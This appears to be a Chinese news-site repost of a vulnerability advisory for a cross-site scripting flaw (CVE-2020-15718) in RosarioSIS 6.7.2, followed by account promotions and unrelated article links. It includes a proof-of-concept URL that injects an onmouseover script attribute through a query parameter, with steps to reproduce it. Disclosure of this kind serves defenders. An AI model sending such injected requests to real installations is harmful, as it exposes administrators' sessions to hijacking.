当前位置: 首页 > news >正文

RosarioSIS 6.7.2 跨站脚本(XSS)漏洞利用详情

news 2026/4/6 5:20:18

漏洞标题:RosarioSIS 6.7.2 - 跨站脚本(XSS)

日期:2025-11-25

漏洞作者:CodeSecLab

供应商主页:https://gitlab.com/francoisjacquet/rosariosis

软件链接:https://gitlab.com/francoisjacquet/rosariosis

版本:6.7.2

测试环境:Windows

CVE:CVE-2020-15718

概念验证(PoC)

http://rosariosis/Modules.php?modname=Scheduling/PrintSchedules.php&search_modfunc=list&include_inactive=" onmouseover="alert(1)"

复现步骤

  1. 以管理员用户身份登录。
  2. 发送上述请求。
  3. 观察结果。
    vFeWrvjTa1MAJGiVvh58g34NURJ0b57eIr+/Db+QwMo=

更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

公众号二维码

公众号二维码

http://www.jsqmd.com/news/161648/

相关文章:

  • Git标签管理:为PyTorch模型版本打上里程碑
  • 全面详解LwIP协议栈及其实现应用
  • Anaconda配置PyTorch环境不再难:结合CUDA镜像一步到位
  • CNN图像分类项目落地:使用PyTorch-CUDA-v2.8镜像快速验证
  • PyTorch Weight Initialization权重初始化策略详解
  • 基于Java的塔吊安全监测智慧管理系统的设计与实现全方位解析:附毕设论文+源代码
  • SSH批量执行命令:统一管理多台PyTorch服务器
  • 聊一聊国内顶尖的五大网络安全攻防实验室
  • 字符验证码的分割与识别思路
  • Markdown Emoji表情符号:增添技术博客趣味性
  • 云端智能体:AI Agent技术与应用研究报告(2025年)|附50页PDF文件下载
  • PyTorch Exponential Moving Average指数移动平均
  • 基于Java的塔吊租赁智慧管理系统的设计与实现全方位解析:附毕设论文+源代码
  • Docker Exec进入运行中容器:调试PyTorch应用现场
  • CSRF漏洞概述和原理【黑客渗透测试零基础入门必知必会】零基础入门到精通,收藏这篇就够了
  • PyTorch混合精度训练:AMP机制降低GPU显存消耗
  • C#之如何添加其他项目
  • CUDA Compute Capability计算能力:选择合适GPU型号
  • HuggingFace TrainingArguments参数详解:控制训练行为
  • 2025国内最新数字科技展厅企业top5推荐!服务深耕于四川、成都、广州、北京、云南等地区,国内优质数字展示服务厂家及品牌权威榜单发布,创新重构展示空间生态 - 全局中转站
  • YOLOv5部署到边缘设备:基于PyTorch Mobile的尝试
  • GitHub热门推荐:PyTorch-CUDA-v2.8镜像开源项目实践
  • 无线真机自动化测试全攻略-appium+phthon
  • C#之跨线程调用UI
  • 2025必备10个降AIGC工具,继续教育者必看!
  • Jupyter Notebook代码折叠:提升长脚本阅读体验
  • GitHub Gist分享代码片段:快速传播PyTorch技巧
  • PyTorch Gradient Clipping:稳定大模型训练过程
  • 《代码大全2》前三分之一观后感
  • [NOIP2021] 棋局